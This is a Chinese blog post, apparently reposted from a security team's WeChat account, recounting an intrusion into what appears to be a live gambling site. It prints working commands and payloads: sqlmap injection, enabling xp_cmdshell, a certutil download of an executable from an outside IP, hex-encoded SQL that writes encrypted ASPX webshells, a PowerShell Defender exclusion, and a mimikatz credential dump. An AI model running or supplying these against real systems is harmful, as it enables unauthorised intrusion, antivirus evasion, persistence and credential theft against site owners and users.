某棋牌渗透记录

渗透技巧 2年前 (2022) admin
685 0 0

前段时间看棋牌这套可以说是已经被打烂了,作为刚入门的我,闲着没事准备练练

某棋牌渗透记录

登录框注入,直接甩sqlmap,也存在弱口令

某棋牌渗透记录

python .sqlmap.py -r .sql222.txt --dbms=mssql --random-agent --tech B --level 5 --risk 3

某棋牌渗透记录

某棋牌渗透记录

得到sqlserver

EXEC sp_configure'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;

盲开xpshell.

某棋牌渗透记录

某棋牌渗透记录

成功接受到,尝试直接powershell CS上线,但是对方有杀软

userName=' WAITFOR DELAY '0:0:1'EXEC master..xp_cmdshell 'whoami'-- wWjW&password=123456&verify=

curl判断出网、站库不分离,准备上马,但是太菜失败嗷

cmd /c certutil.exe -urlcache -split -f http://124.223.118.40/chrome.exe

某棋牌渗透记录

python sqlmap.py -r sql222.txt --os-shell --proxy="http://127.0.0.1:8080" --dbms="mssql" --os-shell --tech=S

还得用sqlmap来搞,我写weblshell还不行嘛

某棋牌渗透记录

某棋牌渗透记录

sqlmap能回显但是太慢

cmd /c "for /f %i in ('dir /s /b c:2c4ef358-b3a3-4d79-8046-64888f56451a.png') do (echo %i> %i.path.txt)" 判断网站路径

某棋牌渗透记录

http://xxxxxxx/Scripts/jquery-1.10.2.min.js.path.txtd:网站后台scriptsjquery-1.10.2.min.js

某棋牌渗透记录

sqlmap写不了嗷 使用burp可,接着写个小马

某棋牌渗透记录

写进去不大对劲草,写了一个.txt这个错误,难道被解析了?

某棋牌渗透记录

aspx可以写,然后就没有然后

<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
^<%@ Page Language="C#" %^>^<%@Import Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^>%27%3BDECLARE%20%40nsqt%20VARCHAR%288000%29%3BSET%20%40nsqt%3D0x6563686f205e3c25402050616765204c616e67756167653d2243232220255e3e5e3c2540496d706f7274204e616d6573706163653d2253797374656d2e5265666c656374696f6e22255e3e5e3c2553657373696f6e2e41646428226b222c226534356533323966656235643932356222293b20627974655b5d206b203d20456e636f64696e672e44656661756c742e47657442797465732853657373696f6e5b305d202b202222292c63203d20526571756573742e42696e6172795265616428526571756573742e436f6e74656e744c656e677468293b417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528225522292e457175616c732874686973293b255e3e203e643a5ccdf8d5be5cbaf3cca85c3131312e61737078%3BEXEC%20master..xp_cmdshell%20%40nsqt--

这里编码要注意

某棋牌渗透记录

echo ^<%@ Page Language="C#" %^>^<%@Import Namespace="System.Reflection"%^>^<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%^> >d:网站后台111.aspx

最后换成冰蝎的马过了

某棋牌渗透记录

权限超级小需要提权,md

某棋牌渗透记录

某棋牌渗透记录

真牛逼啊

先换一个目录写马 才看一波杀软

某棋牌渗透记录

这就不好办了呀,能关吗?当然得试试是把,先登录上数据库看看

某棋牌渗透记录

powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "D:etc-0701GameServer1"

某棋牌渗透记录

没过一会就被杀了 草 落地没被杀 在通信过程中无了,说明免杀这条路还是不错,不过我选择上哥斯拉看看

bypassAV

某棋牌渗透记录

我搞免杀还不行嘛淦

某棋牌渗透记录

次上线很OK,okder没执行几个命令就掉


某棋牌渗透记录

免杀powershell上线

cmd /c powershell -executionpolicy bypass -File

某棋牌渗透记录

N次上线,想抓密码的真难抓啊

某棋牌渗透记录

提权、哟!直接添加用户连接上去

某棋牌渗透记录

关掉嗷 明明白白

某棋牌渗透记录

privilege::debugsekurlsa::logonpasswords


某棋牌渗透记录

参考原因:https://blog.csdn.net/m0_46622606/article/details/105350970

隔了这么久,今天突然看到一个公众号,想起来是不是因为文章中写的补丁原因,准备尝试一下,现在mimikatz已经更新到了2.2.0版本,还没卸载补丁试了下,直接就可以读到HASH了,原因并不清楚,但是现在算是解决了

某棋牌渗透记录

某棋牌渗透记录

成功连接进去,当时我就知道是这个密码猜测和数据库一致但是我硬是连接不进去

某棋牌渗透记录

某棋牌渗透记录

结束、整个过程也是搞着玩的,思路很乱,看看就行

Fate师傅TQL!!!

原文始发于微信公众号(HashRun安全团队):某棋牌渗透记录

版权声明:admin 发表于 2022年11月8日 上午12:09。
转载请注明:某棋牌渗透记录 | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...